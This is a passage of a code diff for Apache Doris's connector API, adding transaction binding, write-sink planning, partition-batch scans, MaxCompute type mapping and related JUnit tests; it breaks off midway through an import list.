a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java @@ -76,4 +76,30 @@ default Map getSessionProperties() { default Optional getCurrentTransaction() { return Optional.empty(); } + + /** + * Binds a transaction to this session so that connector {@code begin*} / + * {@code planWrite} operations can attach their work to it. Mutable session + * implementations (e.g. the engine's {@code ConnectorSessionImpl}) override + * this; the default rejects binding, matching the empty default of + * {@link #getCurrentTransaction()}. + */ + default void setCurrentTransaction(ConnectorTransaction txn) { + throw new UnsupportedOperationException("setCurrentTransaction is not supported by this session"); + } + + /** + * Allocates a globally-unique engine (Doris) transaction id for a connector + * transaction opened via {@link ConnectorWriteOps#beginTransaction(ConnectorSession)}. + * + *

The id is the engine-side transaction id: it is registered in the engine + * transaction registry and stamped into the connector's data sink, so a + * connector must obtain it from the engine rather than mint its own. The + * default throws; the engine session implementation overrides it.

+ * + * @return a fresh engine transaction id + */ + default long allocateTransactionId() { + throw new UnsupportedOperationException("transaction id allocation not supported"); + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java index d7360dd821143b..c30c845f11022a 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java @@ -48,6 +48,16 @@ default boolean supportsInsert() { return false; } + /** + * Returns {@code true} if this connector supports INSERT OVERWRITE (truncate-and-insert) + * semantics. A connector that supports plain INSERT but not overwrite must keep this + * {@code false} so callers reject the command up front (fail loud) instead of silently + * degrading OVERWRITE to a plain append. + */ + default boolean supportsInsertOverwrite() { + return false; + } + /** Returns {@code true} if this connector supports DELETE operations. */ default boolean supportsDelete() { return false; @@ -58,6 +68,22 @@ default boolean supportsMerge() { return false; } + /** + * Returns {@code true} if this connector uses the SPI transaction model: the engine + * opens a {@link org.apache.doris.connector.api.handle.ConnectorTransaction} via + * {@link #beginTransaction(ConnectorSession)}, binds it to the {@link ConnectorSession}, + * and the connector's write plan attaches to that transaction (e.g. maxcompute). + * Connectors with statement-scoped / auto-commit writes (e.g. jdbc) leave this + * {@code false} and use the {@code beginInsert} / {@code finishInsert} handle model. + * + *

The executor routes on this before touching any throwing-default write + * method, so connectors that only support the transaction model need not implement + * {@code getWriteConfig} / {@code beginInsert}.

+ */ + default boolean usesConnectorTransaction() { + return false; + } + // ──────────────────── Write Configuration ──────────────────── /** diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java index 39c912d90da8c3..0ecf9f867612be 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java @@ -52,4 +52,48 @@ public interface ConnectorTransaction extends ConnectorTransactionHandle, Closea /** Called by the engine after commit OR rollback to release connections etc. */ @Override void close(); + + /** + * Receives one serialized commit fragment produced by BE after writing a + * data fragment. The connector deserializes its own Thrift payload (e.g. + * {@code TMCCommitData} / {@code THivePartitionUpdate} / {@code TIcebergCommitData}) + * and accumulates it for {@link #commit()}. + * + *

Default is a no-op for read-only / non-writing connectors.

+ * + * @param commitFragment the serialized connector-specific commit payload + */ + default void addCommitData(byte[] commitFragment) { + // no-op: connectors that participate in writes override this + } + + /** + * Whether this transaction allocates write block ranges through a write-time + * BE→FE callback. Only connectors with a stateful write session that + * hands out block ids (e.g. maxcompute) return {@code true}. + */ + default boolean supportsWriteBlockAllocation() { + return false; + } + + /** + * Allocates a contiguous range of write block ids for the given write + * session, returning the first allocated id. Called from the BE→FE RPC + * path during a write. + * + *

Only invoked when {@link #supportsWriteBlockAllocation()} returns + * {@code true}; the default throws.

+ * + * @param writeSessionId opaque connector-defined write session identifier + * @param count number of block ids to allocate + * @return the first allocated block id + */ + default long allocateWriteBlockRange(String writeSessionId, long count) { + throw new UnsupportedOperationException("write block allocation not supported"); + } + + /** Returns the number of rows affected by the write(s) bound to this transaction. */ + default long getUpdateCnt() { + return 0; + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorWriteHandle.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorWriteHandle.java new file mode 100644 index 00000000000000..b9d2a88812a9e9 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorWriteHandle.java @@ -0,0 +1,50 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.handle; + +import org.apache.doris.connector.api.ConnectorColumn; + +import java.util.List; +import java.util.Map; + +/** + * A bound write request passed to + * {@link org.apache.doris.connector.api.write.ConnectorWritePlanProvider#planWrite}. + * + *

Carries the engine-resolved facts about a single DML write: the target + * table handle, the column list, whether it is an OVERWRITE, and a free-form + * write context (static partition spec, write path, etc.). The connector reads + * these to build its Thrift data sink.

+ */ +public interface ConnectorWriteHandle { + + /** The target table handle (the connector's own opaque table handle). */ + ConnectorTableHandle getTableHandle(); + + /** The columns being written, ordered to match the INSERT column list. */ + List getColumns(); + + /** Whether this is an INSERT OVERWRITE. */ + boolean isOverwrite(); + + /** + * Free-form write context: static partition spec, write path, and other + * connector-defined keys carried from the bound sink to {@code planWrite}. + */ + Map getWriteContext(); +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java index fdb483f25cb9ba..1c472fbb22f303 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java @@ -88,6 +88,91 @@ default List planScan( return planScan(session, handle, columns, filter); } + /** + * Plans the scan restricted to a pruned set of partitions. + * + *

The engine computes partition pruning (Nereids {@code SelectedPartitions}) and + * threads the surviving partitions here so partition-aware connectors can build a read + * session over only those partitions instead of the whole table. The default ignores + * {@code requiredPartitions} and delegates to the 5-arg variant, so connectors that do + * not support partition pushdown are unaffected.

+ * + *

Contract for {@code requiredPartitions}:

+ *
    + *
  • {@code null} or empty → not pruned; scan ALL partitions (default behavior).
  • + *
  • non-empty → scan ONLY these partitions. Each entry is a partition spec string + * (e.g. {@code "pt=1,region=cn"}), i.e. the keys of the pruned partition map.
  • + *
+ * + *

The "pruned to zero partitions" case (a partition predicate that matches nothing) is + * short-circuited by the engine before this method is called, so an empty list here always + * means "not pruned / scan all", never "scan nothing".

+ * + * @param session the current session + * @param handle the table handle + * @param columns the columns to read + * @param filter an optional remaining filter expression + * @param limit the maximum number of rows to return, or -1 for no limit + * @param requiredPartitions the pruned partition spec strings, or null/empty for all + * @return a list of scan ranges + */ + default List planScan( + ConnectorSession session, + ConnectorTableHandle handle, + List columns, + Optional filter, + long limit, + List requiredPartitions) { + return planScan(session, handle, columns, filter, limit); + } + + /** + * Whether this connector supports batched / streaming split generation for a partitioned scan. + * + *

When {@code true}, a partition-aware ScanNode (e.g. {@code PluginDrivenScanNode}) may + * enter batch mode: instead of enumerating all splits synchronously via {@link #planScan}, + * it slices the pruned partitions into batches and calls {@link #planScanForPartitionBatch} + * per batch on a background executor, streaming splits as they are produced (mirrors legacy + * {@code MaxComputeScanNode.startSplit}). The default is {@code false}, so connectors stay on + * the synchronous {@code planScan} path unless they opt in.

+ * + * @param session the current session + * @param handle the table handle + * @return whether batched split generation is supported for this table (default: false) + */ + default boolean supportsBatchScan(ConnectorSession session, ConnectorTableHandle handle) { + return false; + } + + /** + * Plans the scan for a single batch of partitions (used by batch-mode scans). + * + *

Called once per partition batch when the engine drives batch-mode split generation + * (see {@link #supportsBatchScan}). Each call should build a read session over exactly the + * given {@code partitionBatch} and return that batch's scan ranges. The default delegates to + * the 6-arg {@link #planScan} with {@code partitionBatch} as the required partitions, which is + * correct for connectors whose {@code planScan} builds one read session per partition set + * (e.g. MaxCompute). A connector whose {@code planScan} is not partition-set-scoped must + * override this method (and {@link #supportsBatchScan}) before enabling batch mode.

+ * + * @param session the current session + * @param handle the table handle + * @param columns the columns to read + * @param filter an optional remaining filter expression + * @param limit the maximum number of rows to return, or -1 for no limit + * @param partitionBatch the partition spec strings for this batch (non-empty) + * @return the scan ranges for this partition batch + */ + default List planScanForPartitionBatch( + ConnectorSession session, + ConnectorTableHandle handle, + List columns, + Optional filter, + long limit, + List partitionBatch) { + return planScan(session, handle, columns, filter, limit, partitionBatch); + } + /** * Returns scan-node-level properties shared across all scan ranges. * diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/MCTransactionManager.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorSinkPlan.java similarity index 53% rename from fe/fe-core/src/main/java/org/apache/doris/transaction/MCTransactionManager.java rename to fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorSinkPlan.java index a7d1428f641a95..8f9155de3cc613 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/transaction/MCTransactionManager.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorSinkPlan.java @@ -15,22 +15,28 @@ // specific language governing permissions and limitations // under the License. -package org.apache.doris.transaction; +package org.apache.doris.connector.api.write; -import org.apache.doris.datasource.maxcompute.MCTransaction; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; +import org.apache.doris.thrift.TDataSink; -public class MCTransactionManager extends AbstractExternalTransactionManager { +/** + * The result of {@link ConnectorWritePlanProvider#planWrite}: a connector-built + * Thrift data sink describing how BE should write the target table. + * + *

Wraps an opaque {@link TDataSink} (e.g. {@code TMaxComputeTableSink}, + * {@code THiveTableSink}, {@code TIcebergTableSink}). The engine dispatches the + * sink to BE unchanged.

+ */ +public class ConnectorSinkPlan { - private final MaxComputeExternalCatalog catalog; + private final TDataSink dataSink; - public MCTransactionManager(MaxComputeExternalCatalog catalog) { - super(null); - this.catalog = catalog; + public ConnectorSinkPlan(TDataSink dataSink) { + this.dataSink = dataSink; } - @Override - MCTransaction createTransaction() { - return new MCTransaction(catalog); + /** Returns the connector-built data sink to dispatch to BE. */ + public TDataSink getDataSink() { + return dataSink; } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorWritePlanProvider.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorWritePlanProvider.java new file mode 100644 index 00000000000000..a0fea8e0e189f5 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorWritePlanProvider.java @@ -0,0 +1,44 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.write; + +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; + +/** + * Plans the write (sink) for a connector table: produces the opaque + * {@link org.apache.doris.thrift.TDataSink} that BE uses to write data. + * + *

This is the write-side analogue of + * {@link org.apache.doris.connector.api.scan.ConnectorScanPlanProvider}. A + * connector with write capability returns an implementation from + * {@link org.apache.doris.connector.api.Connector#getWritePlanProvider()}; the + * engine calls {@link #planWrite} when translating a physical table sink, then + * dispatches the resulting Thrift data sink to BE unchanged.

+ */ +public interface ConnectorWritePlanProvider { + + /** + * Builds the data sink for the given bound write request. + * + * @param session the current session + * @param handle the bound write request (target table, columns, overwrite, context) + * @return a {@link ConnectorSinkPlan} wrapping the Thrift data sink + */ + ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle); +} diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorColumnTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorColumnTest.java new file mode 100644 index 00000000000000..57f7d4b995664d --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorColumnTest.java @@ -0,0 +1,99 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * Covers the additive {@code isAutoInc} (P2-8 FIX-AUTOINC-REJECT) and {@code isAggregated} + * (G5 FIX-AGG-COLUMN-REJECT) fields added to {@link ConnectorColumn}. + * + *

WHY this matters: each such flag is now a semantic discriminator that the + * connector validation rejects on. equals/hashCode must include it (else a set/map deduping + * {@code ConnectorColumn}s could collapse an auto-inc column onto a plain one, silently dropping + * the flag), and the legacy arities (5/6-arg) must keep {@code isAutoInc=false} so the other six + * connectors and all read-path producers are zero behavior change.

+ */ +public class ConnectorColumnTest { + + @Test + public void equalsAndHashCodeDistinguishAutoInc() { + ConnectorColumn plain = new ConnectorColumn( + "id", ConnectorType.of("INT"), "", false, null, false, false); + ConnectorColumn autoInc = new ConnectorColumn( + "id", ConnectorType.of("INT"), "", false, null, false, true); + + // WHY (Rule 9): two columns differing ONLY by auto-inc are genuinely different; if + // equals/hashCode ignored the field, dedup could re-drop the flag downstream. + // MUTATION: removing `&& isAutoInc == that.isAutoInc` from equals makes this red. + Assertions.assertNotEquals(plain, autoInc, + "columns differing only by isAutoInc must not be equal"); + Assertions.assertNotEquals(plain.hashCode(), autoInc.hashCode(), + "hashCode must reflect isAutoInc"); + } + + @Test + public void defaultCtorsLeaveAutoIncFalse() { + // WHY: locks the additive-default contract -- the 5-arg and 6-arg ctors (used by the other + // six connectors and read-path producers) must keep isAutoInc=false, i.e. zero behavior + // change. MUTATION: changing a delegation default to true makes this red. + ConnectorColumn fiveArg = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", true, null); + ConnectorColumn sixArg = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", true, null, true); + + Assertions.assertFalse(fiveArg.isAutoInc(), "5-arg ctor must default isAutoInc=false"); + Assertions.assertFalse(sixArg.isAutoInc(), "6-arg ctor must default isAutoInc=false"); + Assertions.assertTrue(sixArg.isKey(), "6-arg ctor must still honor isKey=true"); + } + + @Test + public void equalsAndHashCodeDistinguishAggregated() { + ConnectorColumn plain = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", false, null, false, false, false); + ConnectorColumn aggregated = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", false, null, false, false, true); + + // WHY (Rule 9): two columns differing ONLY by isAggregated are genuinely different; if + // equals/hashCode ignored the field, dedup could re-drop the aggregate flag downstream. + // MUTATION: removing `&& isAggregated == that.isAggregated` from equals makes this red. + Assertions.assertNotEquals(plain, aggregated, + "columns differing only by isAggregated must not be equal"); + Assertions.assertNotEquals(plain.hashCode(), aggregated.hashCode(), + "hashCode must reflect isAggregated"); + } + + @Test + public void defaultCtorsLeaveAggregatedFalse() { + // WHY: locks the additive-default contract -- the 5/6/7-arg ctors (used by the other six + // connectors and read-path producers) must keep isAggregated=false, i.e. zero behavior + // change. MUTATION: changing the 7-arg delegation default to true makes this red. + ConnectorColumn fiveArg = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", true, null); + ConnectorColumn sixArg = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", true, null, true); + ConnectorColumn sevenArg = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", true, null, false, true); + + Assertions.assertFalse(fiveArg.isAggregated(), "5-arg ctor must default isAggregated=false"); + Assertions.assertFalse(sixArg.isAggregated(), "6-arg ctor must default isAggregated=false"); + Assertions.assertFalse(sevenArg.isAggregated(), "7-arg ctor must default isAggregated=false"); + Assertions.assertTrue(sevenArg.isAutoInc(), "7-arg ctor must still honor isAutoInc=true"); + } +} diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProviderBatchScanTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProviderBatchScanTest.java new file mode 100644 index 00000000000000..ca241402597817 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProviderBatchScanTest.java @@ -0,0 +1,95 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.scan; + +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorColumnHandle; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Optional; + +/** + * FIX-BATCH-MODE-SPLIT (P4-T06e / NG-7) — guards the two additive SPI defaults on + * {@link ConnectorScanPlanProvider}: {@code supportsBatchScan} and {@code planScanForPartitionBatch}. + * + *

Why this matters: these defaults are what keep the change zero-break for the other + * connectors (es/jdbc/hive/paimon/hudi/trino). {@code supportsBatchScan} MUST default to false so no + * connector silently enters batch mode without opting in; {@code planScanForPartitionBatch} MUST + * delegate to the 6-arg {@code planScan} with the batch as the required partitions (and forward the + * limit), so a connector whose {@code planScan} is partition-set-scoped — like MaxCompute — gets + * correct per-batch behaviour without overriding it.

+ */ +public class ConnectorScanPlanProviderBatchScanTest { + + /** Records the partition list / limit the default planScanForPartitionBatch forwards. */ + private static final class RecordingProvider implements ConnectorScanPlanProvider { + static final List MARKER = Collections.emptyList(); + List recordedRequiredPartitions; + long recordedLimit = Long.MIN_VALUE; + boolean fourArgCalled; + + @Override + public List planScan(ConnectorSession session, ConnectorTableHandle handle, + List columns, Optional filter) { + fourArgCalled = true; + return MARKER; + } + + @Override + public List planScan(ConnectorSession session, ConnectorTableHandle handle, + List columns, Optional filter, + long limit, List requiredPartitions) { + this.recordedLimit = limit; + this.recordedRequiredPartitions = requiredPartitions; + return MARKER; + } + } + + @Test + public void testSupportsBatchScanDefaultsFalse() { + // Default MUST be false: any connector that does not opt in stays on the synchronous path. + ConnectorScanPlanProvider provider = new RecordingProvider(); + Assertions.assertFalse(provider.supportsBatchScan(null, null)); + } + + @Test + public void testPlanScanForPartitionBatchDelegatesToSixArgPlanScan() { + // Default MUST forward the batch as requiredPartitions and pass the limit through to the + // 6-arg planScan, returning its result. A connector with partition-set-scoped planScan + // (MaxCompute) relies on this to avoid overriding the method. + RecordingProvider provider = new RecordingProvider(); + List batch = Arrays.asList("pt=1", "pt=2"); + + List result = + provider.planScanForPartitionBatch(null, null, Collections.emptyList(), + Optional.empty(), -1L, batch); + + Assertions.assertSame(RecordingProvider.MARKER, result); + Assertions.assertSame(batch, provider.recordedRequiredPartitions); + Assertions.assertEquals(-1L, provider.recordedLimit); + // It must route through the 6-arg overload, not collapse to the 4-arg one. + Assertions.assertFalse(provider.fourArgCalled); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCConnectorClientFactory.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCConnectorClientFactory.java index 8e3ec3b1116987..1861e18a599078 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCConnectorClientFactory.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCConnectorClientFactory.java @@ -38,6 +38,9 @@ private MCConnectorClientFactory() { /** * Validates that required authentication properties are present. + * Throws {@link IllegalArgumentException} so that CREATE CATALOG property + * validation ({@code MaxComputeConnectorProvider.validateProperties}) surfaces + * a clean DdlException, consistent with the other connectors' validation. */ public static void checkAuthProperties(Map properties) { String authType = properties.getOrDefault( @@ -49,7 +52,7 @@ public static void checkAuthProperties(Map properties) { if (!properties.containsKey(MCConnectorProperties.ACCESS_KEY) || !properties.containsKey( MCConnectorProperties.SECRET_KEY)) { - throw new RuntimeException( + throw new IllegalArgumentException( "Missing access key or secret key for " + "AK/SK auth type"); } @@ -60,7 +63,7 @@ public static void checkAuthProperties(Map properties) { MCConnectorProperties.SECRET_KEY) || !properties.containsKey( MCConnectorProperties.RAM_ROLE_ARN)) { - throw new RuntimeException( + throw new IllegalArgumentException( "Missing access key, secret key or role arn " + "for RAM Role ARN auth type"); } @@ -68,11 +71,11 @@ public static void checkAuthProperties(Map properties) { MCConnectorProperties.AUTH_TYPE_ECS_RAM_ROLE)) { if (!properties.containsKey( MCConnectorProperties.ECS_RAM_ROLE)) { - throw new RuntimeException( + throw new IllegalArgumentException( "Missing role name for ECS RAM Role auth type"); } } else { - throw new RuntimeException( + throw new IllegalArgumentException( "Unsupported auth type: " + authType); } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCTypeMapping.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCTypeMapping.java index 9a238673803929..4c8f53ded6ed58 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCTypeMapping.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCTypeMapping.java @@ -18,6 +18,7 @@ package org.apache.doris.connector.maxcompute; import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; import com.aliyun.odps.OdpsType; import com.aliyun.odps.type.ArrayTypeInfo; @@ -26,10 +27,12 @@ import com.aliyun.odps.type.MapTypeInfo; import com.aliyun.odps.type.StructTypeInfo; import com.aliyun.odps.type.TypeInfo; +import com.aliyun.odps.type.TypeInfoFactory; import com.aliyun.odps.type.VarcharTypeInfo; import java.util.ArrayList; import java.util.List; +import java.util.Locale; /** * Maps MaxCompute (ODPS) type system to Doris ConnectorType. @@ -46,7 +49,10 @@ public static ConnectorType toConnectorType(TypeInfo typeInfo) { OdpsType odpsType = typeInfo.getOdpsType(); switch (odpsType) { case VOID: - return ConnectorType.of("NULL"); + // "NULL_TYPE" is the token ScalarType.createType recognizes (-> Type.NULL), + // matching legacy MaxComputeExternalTable.mcTypeToDorisType VOID -> Type.NULL. + // "NULL" is NOT recognized (createType throws, swallowed to UNSUPPORTED). + return ConnectorType.of("NULL_TYPE"); case BOOLEAN: return ConnectorType.of("BOOLEAN"); case TINYINT: @@ -94,7 +100,12 @@ public static ConnectorType toConnectorType(TypeInfo typeInfo) { case INTERVAL_YEAR_MONTH: return ConnectorType.of("UNSUPPORTED"); default: - return ConnectorType.of("UNSUPPORTED"); + // Mirror legacy MaxComputeExternalTable.mcTypeToDorisType: fail-fast on a genuinely + // unknown OdpsType rather than silently degrading it to UNSUPPORTED. Known + // unsupported types (BINARY, INTERVAL_*, JSON) have explicit cases above, so this + // default is reached only by a future/unrecognized OdpsType. + throw new DorisConnectorException( + "Cannot transform unknown MaxCompute type: " + odpsType); } } @@ -123,4 +134,84 @@ private static ConnectorType mapStructType(StructTypeInfo structType) { } return ConnectorType.structOf(names, fieldTypes); } + + /** + * Converts a {@link ConnectorType} (as produced by the CREATE TABLE request + * path) to a MaxCompute (ODPS) {@link TypeInfo}. Faithful reverse of the + * legacy {@code MaxComputeMetadataOps.dorisTypeToMcType}; the scalar type + * name is the Doris {@code PrimitiveType} name (e.g. INT, DECIMAL64, + * DATETIMEV2), with CHAR/VARCHAR length and DECIMAL precision/scale carried + * in the {@link ConnectorType} precision/scale fields. + * + * @throws DorisConnectorException if the type cannot be represented in MaxCompute + */ + public static TypeInfo toMcType(ConnectorType type) { + String name = type.getTypeName().toUpperCase(Locale.ROOT); + switch (name) { + case "ARRAY": + return TypeInfoFactory.getArrayTypeInfo( + toMcType(type.getChildren().get(0))); + case "MAP": + return TypeInfoFactory.getMapTypeInfo( + toMcType(type.getChildren().get(0)), + toMcType(type.getChildren().get(1))); + case "STRUCT": + return toMcStructType(type); + default: + return toMcScalarType(name, type); + } + } + + private static TypeInfo toMcScalarType(String name, ConnectorType type) { + switch (name) { + case "BOOLEAN": + return TypeInfoFactory.BOOLEAN; + case "TINYINT": + return TypeInfoFactory.TINYINT; + case "SMALLINT": + return TypeInfoFactory.SMALLINT; + case "INT": + return TypeInfoFactory.INT; + case "BIGINT": + return TypeInfoFactory.BIGINT; + case "FLOAT": + return TypeInfoFactory.FLOAT; + case "DOUBLE": + return TypeInfoFactory.DOUBLE; + case "CHAR": + return TypeInfoFactory.getCharTypeInfo(type.getPrecision()); + case "VARCHAR": + return TypeInfoFactory.getVarcharTypeInfo(type.getPrecision()); + case "STRING": + return TypeInfoFactory.STRING; + case "DECIMALV2": + case "DECIMAL32": + case "DECIMAL64": + case "DECIMAL128": + case "DECIMAL256": + return TypeInfoFactory.getDecimalTypeInfo( + type.getPrecision(), type.getScale()); + case "DATE": + case "DATEV2": + return TypeInfoFactory.DATE; + case "DATETIME": + case "DATETIMEV2": + return TypeInfoFactory.DATETIME; + default: + throw new DorisConnectorException( + "Unsupported type for MaxCompute: " + type); + } + } + + private static TypeInfo toMcStructType(ConnectorType type) { + List children = type.getChildren(); + List names = type.getFieldNames(); + List fieldNames = new ArrayList<>(children.size()); + List fieldTypes = new ArrayList<>(children.size()); + for (int i = 0; i < children.size(); i++) { + fieldNames.add(i < names.size() ? names.get(i) : "col" + i); + fieldTypes.add(toMcType(children.get(i))); + } + return TypeInfoFactory.getStructTypeInfo(fieldNames, fieldTypes); + } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java index 77aef9d8a9a514..0ba559f2d18ae3 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java @@ -19,23 +19,41 @@ import org.apache.doris.connector.api.ConnectorColumn; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorBucketSpec; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorTransaction; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; import com.aliyun.odps.Column; import com.aliyun.odps.Odps; +import com.aliyun.odps.OdpsException; +import com.aliyun.odps.Partition; +import com.aliyun.odps.PartitionSpec; import com.aliyun.odps.Table; +import com.aliyun.odps.TableSchema; +import com.aliyun.odps.Tables; import com.aliyun.odps.table.TableIdentifier; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import 